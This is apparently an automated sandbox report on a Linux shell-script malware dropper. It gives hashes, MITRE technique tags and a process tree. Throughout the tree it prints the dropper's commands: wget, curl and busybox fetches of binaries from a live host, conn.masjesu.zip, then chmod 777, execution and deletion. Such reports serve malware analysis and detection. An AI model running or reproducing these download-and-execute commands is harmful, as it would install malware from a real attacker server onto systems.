f1cbaa85e5e212fbddf89e51402cb69cfa08152e002ddd74fa77a501dc2550b4

Analysis

max time kernel
104s
max time network
108s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
19/11/2024, 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f1cbaa85e5e212fbddf89e51402cb69cfa08152e002ddd74fa77a501dc2550b4.sh
Size

10KB
MD5

3181fce359a0e191b4e8a2ec2ca58735
SHA1

3832ec1ed5fcacfa13dd189e9da211838da74044
SHA256

f1cbaa85e5e212fbddf89e51402cb69cfa08152e002ddd74fa77a501dc2550b4
SHA512

312c30c43236510ad4c6b237258daab7db8169bebc1cf0a33c88703f0fd594e15b39927123f73c662bb1202f1dd0f0dff7f400a24f74bbd88e684f7de6f7bb79
SSDEEP

192:pEwFNSTPmyh3vaZdf7bKHjjUsWizjUhVjzjUhVYUsr9FNSTP27bKZ3vaZd5:pEwFNSTPmyh3vaZdaHjjUsWizjUhVjzb

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
862	chmod
936	chmod
943	chmod
985	chmod
785	chmod
833	chmod
901	chmod
915	chmod
978	chmod
764	chmod
825	chmod
894	chmod
964	chmod
971	chmod
1013	chmod
922	chmod
749	chmod
908	chmod
929	chmod
999	chmod
1020	chmod
884	chmod
957	chmod
1006	chmod
757	chmod
840	chmod
950	chmod
992	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
912	curl
998	busybox
1009	wget
747	busybox
839	busybox
926	curl
932	wget
977	busybox
991	busybox
740	curl
898	curl
940	curl
949	busybox
1017	curl
984	busybox
791	wget
868	wget
888	curl
925	wget
939	wget
968	curl
836	wget
883	busybox
996	curl
956	busybox
960	wget
754	curl
756	busybox
808	curl
830	curl
907	busybox
946	wget
988	wget
782	busybox
918	wget
954	curl
961	curl
995	wget
760	wget
858	busybox
974	wget
1010	curl
942	busybox
981	wget
989	curl
1002	wget
849	curl
914	busybox
919	curl
970	busybox
982	curl
1016	wget
774	curl
843	wget
911	wget
928	busybox
1003	curl
1019	busybox
963	busybox
763	busybox
828	wget
875	curl
900	busybox
904	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE	curl
File opened for modification	/tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT	curl
File opened for modification	/tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n	curl
File opened for modification	/tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS	curl
File opened for modification	/tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY	curl
File opened for modification	/tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh	curl
File opened for modification	/tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT	curl
File opened for modification	/tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl	curl
File opened for modification	/tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo	curl
File opened for modification	/tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno	curl
File opened for modification	/tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE	curl
File opened for modification	/tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno	curl
File opened for modification	/tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r	curl
File opened for modification	/tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh	curl
File opened for modification	/tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl	curl
File opened for modification	/tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg	curl
File opened for modification	/tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF	curl
File opened for modification	/tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS	curl
File opened for modification	/tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo	curl
File opened for modification	/tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU	curl
File opened for modification	/tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF	curl
File opened for modification	/tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY	curl
File opened for modification	/tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg	curl
File opened for modification	/tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n	curl
File opened for modification	/tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv	curl
File opened for modification	/tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r	curl
File opened for modification	/tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv	curl
File opened for modification	/tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU	curl

/tmp/f1cbaa85e5e212fbddf89e51402cb69cfa08152e002ddd74fa77a501dc2550b4.sh
/tmp/f1cbaa85e5e212fbddf89e51402cb69cfa08152e002ddd74fa77a501dc2550b4.sh
1⤵
PID:717
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:720
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  PID:726
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:740
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - System Network Configuration Discovery
  PID:747
- /bin/chmod
  chmod 777 dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  ./dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - Executes dropped EXE
  PID:750
- /bin/rm
  rm dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  PID:752
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  PID:753
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:754
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - System Network Configuration Discovery
  PID:756
- /bin/chmod
  chmod 777 rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - File and Directory Permissions Modification
  PID:757
- /tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  ./rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - Executes dropped EXE
  PID:758
- /bin/rm
  rm rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  PID:759
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - System Network Configuration Discovery
  PID:760
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - System Network Configuration Discovery
  PID:763
- /bin/chmod
  chmod 777 cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  ./cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  PID:768
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  PID:769
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:774
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - System Network Configuration Discovery
  PID:782
- /bin/chmod
  chmod 777 OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  ./OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - Executes dropped EXE
  PID:786
- /bin/rm
  rm OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  PID:790
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - System Network Configuration Discovery
  PID:791
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:808
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  PID:820
- /bin/chmod
  chmod 777 DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  ./DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm DH1MmD4fcgYdOGKUaEOWSljzWaSaF4oCGE
  2⤵
  PID:827
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - System Network Configuration Discovery
  PID:828
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:830
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  PID:832
- /bin/chmod
  chmod 777 lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - File and Directory Permissions Modification
  PID:833
- /tmp/lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  ./lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  - Executes dropped EXE
  PID:834
- /bin/rm
  rm lCmzMzy10De6K76cAoPD8qRXIr4gy8YrvT
  2⤵
  PID:835
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - System Network Configuration Discovery
  PID:836
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - System Network Configuration Discovery
  PID:839
- /bin/chmod
  chmod 777 YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  ./YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm YuMp82N9zROSjtDd0AcKpdBlOeFWXZo1gF
  2⤵
  PID:842
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - System Network Configuration Discovery
  PID:843
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:849
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - System Network Configuration Discovery
  PID:858
- /bin/chmod
  chmod 777 qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  ./qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - Executes dropped EXE
  PID:864
- /bin/rm
  rm qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  PID:867
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - System Network Configuration Discovery
  PID:868
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:875
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - System Network Configuration Discovery
  PID:883
- /bin/chmod
  chmod 777 4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  ./4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm 4HRTUZF7egiT297nOXXVua0U2PytPm2Rkl
  2⤵
  PID:886
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:888
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  PID:893
- /bin/chmod
  chmod 777 QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  ./QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  - Executes dropped EXE
  PID:895
- /bin/rm
  rm QhoUhaFiYEAiXXB0U2ObfJBUX2Tkn7s59r
  2⤵
  PID:896
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  PID:897
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:898
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - System Network Configuration Discovery
  PID:900
- /bin/chmod
  chmod 777 WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - File and Directory Permissions Modification
  PID:901
- /tmp/WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  ./WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  - Executes dropped EXE
  PID:902
- /bin/rm
  rm WN8tXO50p1h2xAyC2THmqnX2OURjWtyeXU
  2⤵
  PID:903
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - System Network Configuration Discovery
  PID:904
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:905
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - System Network Configuration Discovery
  PID:907
- /bin/chmod
  chmod 777 AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - File and Directory Permissions Modification
  PID:908
- /tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  ./AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - Executes dropped EXE
  PID:909
- /bin/rm
  rm AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  PID:910
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - System Network Configuration Discovery
  PID:911
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:912
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - System Network Configuration Discovery
  PID:914
- /bin/chmod
  chmod 777 QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  ./QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  PID:917
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - System Network Configuration Discovery
  PID:918
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  PID:921
- /bin/chmod
  chmod 777 GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  ./GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - Executes dropped EXE
  PID:923
- /bin/rm
  rm GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  PID:924
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - System Network Configuration Discovery
  PID:925
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:926
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - System Network Configuration Discovery
  PID:928
- /bin/chmod
  chmod 777 GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - File and Directory Permissions Modification
  PID:929
- /tmp/GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  ./GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  - Executes dropped EXE
  PID:930
- /bin/rm
  rm GfqI0ExXDRG3xczOL4ewjQIfjEcnbhfK9n
  2⤵
  PID:931
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - System Network Configuration Discovery
  PID:932
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:933
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  PID:935
- /bin/chmod
  chmod 777 AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - File and Directory Permissions Modification
  PID:936
- /tmp/AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  ./AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  - Executes dropped EXE
  PID:937
- /bin/rm
  rm AHpKoX7WfWKntwDX4rUALXWJVzQ5wQfQvg
  2⤵
  PID:938
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - System Network Configuration Discovery
  PID:939
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:940
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - System Network Configuration Discovery
  PID:942
- /bin/chmod
  chmod 777 QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - File and Directory Permissions Modification
  PID:943
- /tmp/QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  ./QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  - Executes dropped EXE
  PID:944
- /bin/rm
  rm QsrczopMLY8I2gXUi7sOGVsVI1WWcx5Udo
  2⤵
  PID:945
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - System Network Configuration Discovery
  PID:946
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:947
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - System Network Configuration Discovery
  PID:949
- /bin/chmod
  chmod 777 cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /tmp/cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  ./cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  - Executes dropped EXE
  PID:951
- /bin/rm
  rm cYOgocc1QYc8Wp0fkzL4Np2W94Ixf1rAno
  2⤵
  PID:952
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  PID:953
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:954
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - System Network Configuration Discovery
  PID:956
- /bin/chmod
  chmod 777 dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - File and Directory Permissions Modification
  PID:957
- /tmp/dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  ./dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  - Executes dropped EXE
  PID:958
- /bin/rm
  rm dUWQfcDza44TqQZwfKyWjJ3STBXRCPSvMS
  2⤵
  PID:959
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - System Network Configuration Discovery
  PID:960
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:961
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - System Network Configuration Discovery
  PID:963
- /bin/chmod
  chmod 777 rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  ./rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  - Executes dropped EXE
  PID:965
- /bin/rm
  rm rYwaP2snVGy03d78wKeO9CVPcvyEL33zQv
  2⤵
  PID:966
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  PID:967
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:968
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - System Network Configuration Discovery
  PID:970
- /bin/chmod
  chmod 777 qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - File and Directory Permissions Modification
  PID:971
- /tmp/qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  ./qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  - Executes dropped EXE
  PID:972
- /bin/rm
  rm qwl05Pdk7kVIC3sZb5RLp8ARBBsvC4lnyY
  2⤵
  PID:973
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - System Network Configuration Discovery
  PID:974
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:975
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - System Network Configuration Discovery
  PID:977
- /bin/chmod
  chmod 777 OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
  - File and Directory Permissions Modification
  PID:978
- /tmp/OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  ./OgHxxrUKGF2DC93TErrhbLgJkzo7X63Moh
  2⤵
